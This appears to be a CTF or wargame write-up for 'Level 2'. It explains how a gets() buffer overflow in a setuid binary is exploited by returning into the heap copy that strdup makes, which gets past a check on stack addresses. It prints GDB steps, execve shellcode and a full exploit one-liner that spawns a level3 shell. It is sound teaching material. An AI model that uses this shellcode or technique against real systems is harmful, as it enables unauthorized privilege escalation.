# Level 2 — Exam Notes

## 1. Objective

Get a level3 shell. The binary is setuid level3; no `system` in the normal flow. You need to execute shellcode (`execve("/bin/sh")`).

---

## 2. Initial Diagnosis (before GDB)

| Property | Detail |
|----------|--------|
| Vulnerable function | `gets` in `p()` |
| Buffer location | `ebp - 0x4c` |
| No bounds check | `gets` reads unlimited input |
| Stack check | `(ret & 0xb0000000) == 0xb0000000` → exits if stack address |
| Key observation | `strdup(buf)` copies the buffer to the heap after the check |

- **Vulnerability:** `gets` writes unlimited input into a 76-byte buffer → buffer overflow
- **Obstacle:** the program checks the return address — if it starts with `0xb` (stack address) it calls `_exit(1)`
- **Bypass:** heap addresses start with `0x08`, not `0xb` → pass the check naturally
- **Plan:** put shellcode at the start of the buffer, overwrite return address with the heap address where `strdup` copies it → shellcode executes from the heap

---

## 3. GDB Diagnosis

### Stack layout

```
[ buffer — 76 bytes ][ saved EBP — 4 bytes ][ return address — 4 bytes ]
  ebp - 0x4c                                  ← overwrite target
```

**Offset to return address:** `0x4c + 4 = 80 bytes`

> Verification: send 80 bytes + `\x42\x42\x42\x42` → segfault at `0x42424242` confirms offset.

### Finding the heap address

Set a breakpoint right after `strdup` returns, at the `leave` instruction:

```bash
(gdb) b *0x0804853d
(gdb) run
AAAA
(gdb) p/x $eax
$1 = 0x804a008
```

- `$eax` holds the return value of `strdup` = the heap address where our buffer was copied
- `0x0804a008` starts with `0x08` → **passes the check**
- ASLR is disabled on this VM → this address is stable across runs

### Flow control

```
gets() fills buffer with:
  [shellcode][padding][0x0804a008]
        ↓
check: 0x0804a008 & 0xb0000000 = 0x00000000 ≠ 0xb0000000 → passes
        ↓
strdup() copies buffer to heap at 0x0804a008
  → shellcode is now on the heap
        ↓
return → CPU jumps to 0x0804a008
  → shellcode executes → /bin/sh spawns
```

---

## 4. Building the Exploit

### Payload structure

```
[ shellcode — 28 bytes ][ padding A × 52 ][ 0x0804a008 little-endian ]
        28              +       52        +          4               = 84 bytes
```

- First 80 bytes fill the buffer (76) + saved EBP (4)
- Last 4 bytes overwrite the return address with the heap address

### Address encoding (little-endian)

```
0x0804a008 → \x08\xa0\x04\x08
```

### Shellcode used (28 bytes — execve("/bin//sh"))
https://shell-storm.org/shellcode/files/shellcode-811.html

```
\x31\xc0\x50\x68\x2f\x2f\x73\x68
\x68\x2f\x62\x69\x6e\x89\xe3\x89
\xc1\x89\xc2\xb0\x0b\xcd\x80\x31
\xc0\x40\xcd\x80
```

---

## 5. Exploit Command

```bash
(python -c 'print "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80" + "A" * 52 + "\x08\xa0\x04\x08"'; cat) | ./level2
```

> `( ...; cat )` keeps stdin open so the spawned shell stays alive.

---

## 6. Expected Result

```bash
$ whoami
level3
$ cat /home/user/level3/.pass
<flag>
```

---

## 7. Summary

| Step | What happens |
|------|-------------|
| `gets()` | Reads our crafted input into 76-byte buffer — no bounds check |
| Overflow | Padding overwrites saved EBP and return address with `0x0804a008` |
| Check | `0x0804a008` starts with `0x08` → not a stack address → passes |
| `strdup()` | Copies our buffer (shellcode included) to heap at `0x0804a008` |
| `return` | CPU jumps to `0x0804a008` → executes shellcode → shell spawns |

**Key insight:** we do not fight the stack check — we use the heap. `strdup` copies our shellcode there automatically. We just point the return address at it.
